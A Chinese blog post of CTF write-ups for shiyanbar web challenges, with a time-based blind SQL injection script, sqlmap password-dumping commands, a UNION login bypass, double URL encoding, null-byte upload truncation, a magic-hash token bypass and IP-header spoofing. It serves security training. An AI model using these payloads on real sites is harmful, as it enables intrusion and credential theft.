实验吧部分题wp

最新推荐文章于 2020-11-25 20:38:27 发布
原创 最新推荐文章于 2020-11-25 20:38:27 发布 · 634 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文解析了多个CTF挑战,包括SQL注入、文件上传绕过等技术,并提供了详细的解决步骤及代码示例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

看起来有点难

这道题有点坑,打开页面去试下登录,发现输入admin/admin会报登录失败,错误的用户名和密码,其他的就说数据库没有连上,一开始真的以为没有连上..............

然后后面看了下别人的评论,题目没错,那就可能是除了admin其他都是定义好了跳出来数据库没连上

http://ctf5.shiyanbar.com/basic/inject/index.php?username=admin' and sleep(10) and ''='&pass=&action=login

然后看见是有延时的,也就是说是可以时间盲注

然后脚本贴一波

#-*-coding:utf-8-*-
import requests
import time

payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.{}*'

flag = ""
key = 0
print("start")
for i in range(1,50):
    if key == 1:
        break
    for payload in payloads:
        starttime = time.time()  #记录当前时间
        headers ={           #header头信息
            "Host": "ctf5.shiyanbar.com",
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
            "Accept-Encoding": "gzip, deflate",
            "Accept-lanuage": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Connection": "keep-alive",
            "Cookie": "Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1526381912,1526540869,1527213157,1527225613; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*131924%2CnickName%3AXi4or0uji; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1527238356; source=1",

        }
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin' and case when(substr(password,%s,1)='%s') then sleep(10) else sleep(0) end and ''='&pass=&action=login" %(i,payload)  #数据库
        res = requests.get(url, headers=headers)
        if time.time() - starttime > 10:
            flag += payload
            print("pwd is:%s"%flag)
            break
        else:
            if payload == '*':
                key = 1
                break
    print('[Finally] current pwd is %s '%flag)

然后跑出来的结果是这样的

到了这里,拿admin和idnuenna登录就行了

这道题还可以sqlmap一波,不过很慢很慢...............

爆数据库

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" --dbs

爆表

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" -D test --tables

爆字段

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" -D test -T admin --columns

爆密码

sqlmap -u "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=admin&pass=admin&action=login" -D test -T admin -C password --dump

最后登录拿flag

程序逻辑问题

进去调试看见有个index.txt,访问试一下

<html>
<head>
welcome to simplexue
</head>
<body>
<?php


if($_POST[user] && $_POST[pass]) {
	$conn = mysql_connect("********, "*****", "********");
	mysql_select_db("phpformysql") or die("Could not select database");
	if ($conn->connect_error) {
		die("Connection failed: " . mysql_error($conn));
} 
$user = $_POST[user];
$pass = md5($_POST[pass]);

$sql = "select pw from php where user='$user'";
$query = mysql_query($sql);
if (!$query) {
	printf("Error: %s\n", mysql_error($conn));
	exit();
}
$row = mysql_fetch_array($query, MYSQL_ASSOC);
//echo $row["pw"];
  
  if (($row[pw]) && (!strcasecmp($pass, $row[pw]))) {
	echo "<p>Logged in! Key:************** </p>";
}
else {
    echo("<p>Log in failure!</p>");
	
  }
  
  
}

?>
<form method=post action=index.php>
<input type=text name=user value="Username">
<input type=password name=pass value="Password">
<input type=submit>
</form>
</body>
<a href="index.txt">
</html>

题目说的很清楚,读代码去找漏洞就是了

上面的sql语句看见user是可以进行注入的,然后后面又要查询查来的东西的里面pw的md5值是不是跟输入的密码的md5值相同,如果相同就出flag,然后到了这里就可以构造payload了

user=1' and 0=1 union select md5(1)#
pass=1

解释一波

这里的username前面and0=1可以让前面的查询不成功,然后后面再给一个值,那样的话就会返回一个md5(1)的值了,password再输入一个1,刚好就可以绕过出flag了

php大法

这道题进去就叫你看index.php.txt,然后有段源码

<?php
if(eregi("hackerDJ",$_GET[id])) {
  echo("<p>not allowed!</p>");
  exit();
}

$_GET[id] = urldecode($_GET[id]);
if($_GET[id] == "hackerDJ")
{
  echo "<p>Access granted!</p>";
  echo "<p>flag: *****************} </p>";
}
?>


<br><br>
Can you authenticate to this website?

然后题目大概意思是要输入一个id,他的值不能是heckerDJ,但是urldecode后要是hackerDJ,看起来很矛盾,但是我们发现,浏览器传输过程是会对url进行解码的,所以我们就可以进行二次加密,构造payload

shell?id=%25%36%38%25%36%31%25%36%33%25%36%62%25%36%35%25%37%32%25%34%34%25%34%61

上传绕过

先发一张图片,然后就

那我传个php行了吧

妙啊................

这个是考了0x00截断

路径uploads/a.php+1.1.jpg如果将+的十六进制改成00,那么会认为路径已经截断了,后面的值1.1.jpg就会覆盖到前面的值,所以这样就可以绕过了

用repeater改一下加号改成00

然后go就有flag了

这里文件上传漏洞找到一篇挺好的博客

https://blog.youkuaiyun.com/wy_97/article/details/76549761

忘记密码了

这个题目真的要很细心...........发送邮件然后就看到

有个弹窗给个路径,访问下路径说没有定义然后跳回step1

但是可以看见后台是用vim写的,找下备份文件,最后在http://ctf5.shiyanbar.com/10/upload/.submit.php.swp找

所以submit的认证就是前面是管理员的邮箱地址,后面加个token,token的要求是值为0同时长度为10,这里用个科学计数法就可以绕过了,但是管理员邮箱鬼知道它是什么啊........................

后面看见前面已经给了admin@simplexue.com

然后payload都出来了

http://ctf5.shiyanbar.com/10/upload/submit.php?emailAddress=admin@simplexue.com&token=0e00000000

这里注意的是提交到submit.php,就第二张抓包的图里说了

貌似有点难

这题巨简单好吧.........

题目给了源码

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
	$cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
	$cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
	$cip = $_SERVER["REMOTE_ADDR"];
else
	$cip = "0.0.0.0";
return $cip;
}

$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "错误!你的IP不在访问列表之内!";
}
?>

其实就是改下ip就行了,用火狐改个代理flag就出来了

头有点大

这题提示巨明显

也是火狐改下代理,浏览器是ie,net framework是.NET CLR 9.9,最后语言是en-gb

发送getflag

实验吧-web-wp
Iambangbang的博客
08-21 676
登陆一下好吗? 这道目是一道技巧性的目,显然,问的关键在于通过语句构造使得返回报错,然而,我也并不知道如何去构造,这道是看了一位师傅的WP才写出来的,原来万能密码可以这样用……涨知识了。 ,起初尝试万能密码,提交以后,回弹 ,发现or被过滤了。。然后我就没往后想,继续策马奔腾去了,某位师傅的做法比较高明,直接构造admin’=’进行提交,回弹flag Who are you? 点
实验部分wp
sinat_38235368的博客
10-17 755
欢迎使用Markdown编辑器写博客本Markdown编辑器使用StackEdit修改而来,用它写博客,将会带来全新的体验哦: Markdown和扩展Markdown简洁的语法 代码块高亮 图片链接和图片上传 LaTex数学公式 UML序列图和流程图 离线写博客 导入导出Markdown文件 丰富的快捷键 快捷键 加粗 Ctrl + B 斜体 Ctrl + I 引用 Ctrl
实验吧WEBWP
08-10
这是自己做的一个实验吧的十七到目的WP,其中也有别人的WP
实验吧WEBWP(二)
Yale的博客
03-20 1532
1.Once More(http://www.shiyanbar.com/ctf/1805) 点击—view the source code 关键码 else if (strlen(_GET['password']) < 8 &&_GET['password']) < 8 && _GET[‘password’] > 9999999) { if (strpos ($
实验吧WEBWP(一)
Yale的博客
03-19 2772
1.Forms(链接:http://www.shiyanbar.com/ctf/1819) 页面很干净,第一反应查看源码 在此之前,我们先随便输入然后点击enter,没什么线索 源码中我们看到value=0 将value改为1,再随便输入然后点击enter 毫无疑问,输入的内容就应该是a的值 得到flag2.天网管理系统(http://www.shiyanbar.com/ctf/
实验部分WP(一)
Samantha1111的博客
07-29 238
后台登陆 这道给了一个登录框,第一反应是sql注入。随便输个东西进去发现没反应,就先看看源码。 SQL注入实锤了 源码大概意思是用输入经过md5加密后的密码和admin用户名查询,结果等于sql,然后看数据库中是否存在sql。将MD5值转化为16位原始二进制格式。 知识点: mysqli_query(connection,query,resultmode)函数: connection: 必需。...
实验WP(密码学部分)【变异凯撒,传统知识+古典密码,try them all,trival】
taozijun的博客
07-10 2110
一. 变异凯撒找规律找规律,既然说是凯撒那就看看怎么移动才能得到flag。因为flag{前四个字符是确定的,所以对比下密文和flag{的ascii码。发现规律是这样,然后写个python脚本#-*- coding:utf-8 -*- from __future__ import print_function import string str = "afZ_r9VYfScOeO_UL^RWUc" ...
HECTF2020web部分wp
weixin_46330722的博客
11-25 1847
HECTF签到ezphpssrfmexiazhu 这两周太忙了,考试和实验都堆在一起了,人没了。上周末抽空做了一下HECTF,签到关机一气呵成。 签到 点一下忘记密码 然后就输入手机号,并输入四位验证码。手机号可以在登陆界面的注释中找到,这里说是四位数验证码,那就应该是爆破了。菜鸡的脚本附上 import requests url1='http://121.196.32.184:8080/findpass.php?num=15970773575&check=' url2='&next=%E
西普实验部分逆向writeup(二)
caterpillarous的博客
12-24 4997
本博客已经弃用,我的新博客地址:http://jujuba.me/ 1.考验你能力的时候到了老规矩 PEID查壳 显示什么也没找到 先别管 拖到OD里搜索字符串看看可以发现最上面的字符串,其实挺像KEY的,输入试试,发现这个并不是KEY。进入字符串“这就是我要的flag!!!”上方下个断点,先让程序跑一下,然后断下来开始单步调试单步了几下发现一个字符串的处理,我输入的是“1234”注意左上角的EA...
实验吧WEBWP(三)
Yale的博客
03-20 677
1.Forbidden(http://www.shiyanbar.com/ctf/21) 目提示Make sure you are in HongKong 所以修改header就行了 将Accept-Language中的zh-CN修改为zh-hk就行了,(hk代表香港) 2.猫抓老鼠(http://www.shiyanbar.com/ctf/20) 都提示catch了,无疑是抓包 先
ctf-实验吧-web-Once More-wp
a3uRa的一个窝
04-14 407
  这个是我第二遍做,第一遍是第一个账号做的,当时还是小白,真的什么也不会,当然现在水平还是很低。。。   第二遍又重创了个实验吧的账号,这次打算不去上网搜 wp,自己做做看,开是刷。。。   ereg()函数漏洞,科学记数法, ~~~打开后,点击view the source code,直接可以看到源代码,毋庸置疑,代码审计 &lt;?php if (isset ($_GET['p...
实验部分WP(二)
Samantha1111的博客
08-05 543
你真的会PHP吗 看看源代码发现没啥,然后抓个包发现一个hint 打开这个http://ctf5.shiyanbar.com/web/PHP/6c525af4059b4fe7d8c33a.txt 得到PHP代码:
实验吧逆向工程Just Click---WP
Yale的博客
05-02 2241
表示只会用peid,结果还发现是个不知名的壳。。 果断换个神器 发现是C#的,于是上.NET Reflector 翻着翻着就发现了一个看名称是button check按钮检查的东西,就是它了,点进去看看 红色的就是按键的顺序,按照这个顺序按一遍就出flag了
实验吧安全杂项WP(一)
Yale的博客
03-20 6827
1.紧急报文(http://www.shiyanbar.com/ctf/1955) 密文都由ADFGX,百度一下,发现有个ADFGX密码 密码表如图 对应着解密即可 FA XX DD AG FF XG FD XG DD DG GA XF FA flagxidianctf 提交:flag_Xd{hSh_ctf:flagxidianctf}2.flag.xls(http://www.
实验吧 忘记密码了wp
0verWatch的博客
03-18 594
这个一开始给了一个登录框 先不管输入东西抓一个包看一下 发现有几样有用的东西 第一个是admin对应的邮箱admin@simplexue.com 第二个是一个Vim。。。。 这里就要讲一下一个知识点 一、vim备份文件 默认情况下使用Vim编程,在修改文件后系统会自动生成一个带~的备份文件,某些情况下可以对其下载进行查看; eg: index.php普遍意义上的首页,输入域名不...
实验吧 WEB writeup(详细基础)
weixin_43960884的博客
07-20 4774
简单的登录 不简单 后台登录 $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; 文件名ffifdyop就是目的线索 做个测试 实际上原始二进制为 'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 但由于\之后的三个符号会组合成一...
实验WP(web部分)【简单的登录,后台登录,加了料的报错注入,认真一点,你真的会PHP吗?】
taozijun的博客
05-22 7524
一. 简单的登录这道一点也不简单,用到cbc字节翻转攻击等技术,先跳过这,想了解可看实验吧上pcat大神的writeup。二. 后台登录这道
实验吧安全杂项WP(五)
Yale的博客
03-21 3191
1.SOS(http://www.shiyanbar.com/ctf/1850) 先给出答案 CTF{131Ack_3Y3_gA1AxY} 我做的时候文件名排序出了问,python也是乱码,等解决了再来写wp2.绕(http://www.shiyanbar.com/ctf/1847) 确实蛮绕的 打开网页什么都没有,F12看看 发现一段 将eval改为console.log后执行
JavaScript入门实验F28WP-lab1指南
"F28WP-lab1" 中的"F28WP"可能指的是某个课程的代码或者是实验室的名称,"lab1"表明这是实验或练习的第一部分。标本身并没有提供太多关于实验内容的信息,但可以确定的是,这是一个编程实践环节。 描述部分...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值